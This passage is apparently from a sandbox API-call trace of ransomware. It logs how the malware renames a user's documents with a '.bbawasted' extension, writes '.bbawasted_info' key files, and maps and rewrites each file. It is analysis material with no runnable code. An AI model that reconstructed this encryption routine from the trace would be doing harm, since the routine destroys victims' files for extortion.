(hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.832] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.833] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.833] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.842] SetEndOfFile (hFile=0x120) returned 1 [0070.963] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.963] CloseHandle (hObject=0x120) returned 1 [0070.965] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.965] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c86d8 | out: hHeap=0x580000) returned 1 [0070.965] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.966] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.966] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.966] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\OsXrXsAzk7orh_YxBKc0.xlsx") returned 75 [0070.966] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a0) returned 0x5bf070 [0070.966] lstrcpyW (in: lpString1=0x5bf106, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.966] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0070.966] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0071.209] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0071.209] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\OsXrXsAzk7orh_YxBKc0.xlsx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\osxrxsazk7orh_yxbkc0.xlsx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.259] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0071.260] SetEndOfFile (hFile=0x120) returned 1 [0071.260] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.260] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.260] lstrcpyW (in: lpString1=0x5bf106, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\OsXrXsAzk7orh_YxBKc0.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\osxrxsazk7orh_yxbkc0.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\OsXrXsAzk7orh_YxBKc0.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\osxrxsazk7orh_yxbkc0.xlsx.bbawasted")) returned 1 [0071.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\OsXrXsAzk7orh_YxBKc0.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\osxrxsazk7orh_yxbkc0.xlsx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.261] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0071.262] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x8496 [0071.262] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8496) returned 0x570000 [0071.262] CloseHandle (hObject=0xf8) returned 1 [0071.265] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0071.265] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.265] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.265] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0071.266] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0071.266] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.274] SetEndOfFile (hFile=0x120) returned 1 [0071.276] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.277] CloseHandle (hObject=0x120) returned 1 [0071.278] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0071.278] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca9e0 | out: hHeap=0x580000) returned 1 [0071.278] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0071.279] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0071.279] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.279] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\UItrH.ots") returned 59 [0071.279] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x280) returned 0x5ca828 [0071.279] lstrcpyW (in: lpString1=0x5ca89e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.280] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0071.280] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0071.280] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0071.280] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\UItrH.ots.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\uitrh.ots.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.281] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0071.282] SetEndOfFile (hFile=0x120) returned 1 [0071.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.282] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.282] lstrcpyW (in: lpString1=0x5ca89e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\UItrH.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\uitrh.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\UItrH.ots.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\uitrh.ots.bbawasted")) returned 1 [0071.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\UItrH.ots.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\uitrh.ots.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.283] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0071.283] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x4a4f [0071.283] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a4f) returned 0x570000 [0071.283] CloseHandle (hObject=0xfc) returned 1 [0071.285] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0071.286] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.286] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.286] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0071.287] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0071.287] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.320] SetEndOfFile (hFile=0x120) returned 1 [0071.388] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5caab0 | out: hHeap=0x580000) returned 1 [0071.388] CloseHandle (hObject=0x120) returned 1 [0071.390] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca828 | out: hHeap=0x580000) returned 1 [0071.390] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0071.390] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0071.391] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0071.391] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.391] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\47X6.xlsx") returned 53 [0071.391] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x274) returned 0x5bf070 [0071.391] lstrcpyW (in: lpString1=0x5bf0da, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.391] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0071.391] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0071.392] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0071.392] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\47X6.xlsx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\47x6.xlsx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.393] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0071.394] SetEndOfFile (hFile=0x120) returned 1 [0071.394] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.394] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.394] lstrcpyW (in: lpString1=0x5bf0da, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\47X6.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\47x6.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\47X6.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\47x6.xlsx.bbawasted")) returned 1 [0071.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\47X6.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\47x6.xlsx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.395] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0071.395] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x1793 [0071.395] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1793) returned 0x570000 [0071.395] CloseHandle (hObject=0xfc) returned 1 [0071.397] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0071.397] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.397] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.398] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0071.398] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0071.398] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.407] SetEndOfFile (hFile=0x120) returned 1 [0071.409] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.409] CloseHandle (hObject=0x120) returned 1 [0071.410] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0071.410] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca680 | out: hHeap=0x580000) returned 1 [0071.410] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0071.411] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0071.411] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zKYHxLD12 LY9US.pptx") returned 65 [0071.411] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28c) returned 0x5bf070 [0071.411] lstrcpyW (in: lpString1=0x5bf0f2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.411] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0071.411] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0071.412] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0071.412] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zKYHxLD12 LY9US.pptx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5zkyhxld12 ly9us.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.413] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0071.414] SetEndOfFile (hFile=0x120) returned 1 [0071.414] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.414] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.414] lstrcpyW (in: lpString1=0x5bf0f2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.414] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zKYHxLD12 LY9US.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5zkyhxld12 ly9us.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zKYHxLD12 LY9US.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5zkyhxld12 ly9us.pptx.bbawasted")) returned 1 [0071.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5zKYHxLD12 LY9US.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5zkyhxld12 ly9us.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.415] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0071.415] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x1449e [0071.415] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1449e) returned 0x11a0000 [0071.415] CloseHandle (hObject=0x110) returned 1 [0071.497] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0071.498] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.498] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.498] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0071.499] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0071.499] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.508] SetEndOfFile (hFile=0x120) returned 1 [0071.579] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.579] CloseHandle (hObject=0x120) returned 1 [0071.581] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0071.581] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca748 | out: hHeap=0x580000) returned 1 [0071.581] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0071.582] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0071.582] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.582] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\da.docx") returned 51 [0071.582] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x270) returned 0x5be8c0 [0071.582] lstrcpyW (in: lpString1=0x5be926, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.582] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0071.582] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0071.582] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0071.582] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\da.docx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\da.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.612] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0071.613] SetEndOfFile (hFile=0x120) returned 1 [0071.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.613] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.613] lstrcpyW (in: lpString1=0x5be926, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\da.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\da.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\da.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\da.docx.bbawasted")) returned 1 [0071.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\da.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\da.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.614] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0071.614] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x15cec [0071.614] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15cec) returned 0xfe0000 [0071.614] CloseHandle (hObject=0x110) returned 1 [0071.619] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0071.619] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.619] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.619] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0071.620] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0071.620] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.629] SetEndOfFile (hFile=0x120) returned 1 [0071.631] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.631] CloseHandle (hObject=0x120) returned 1 [0071.632] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5be8c0 | out: hHeap=0x580000) returned 1 [0071.632] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2b40 | out: hHeap=0x580000) returned 1 [0071.632] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0071.633] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0071.633] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.633] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DFfRMeYWJQ7e-5.docx") returned 63 [0071.633] RtlAllocateHeap (HeapHandle=0x580000, 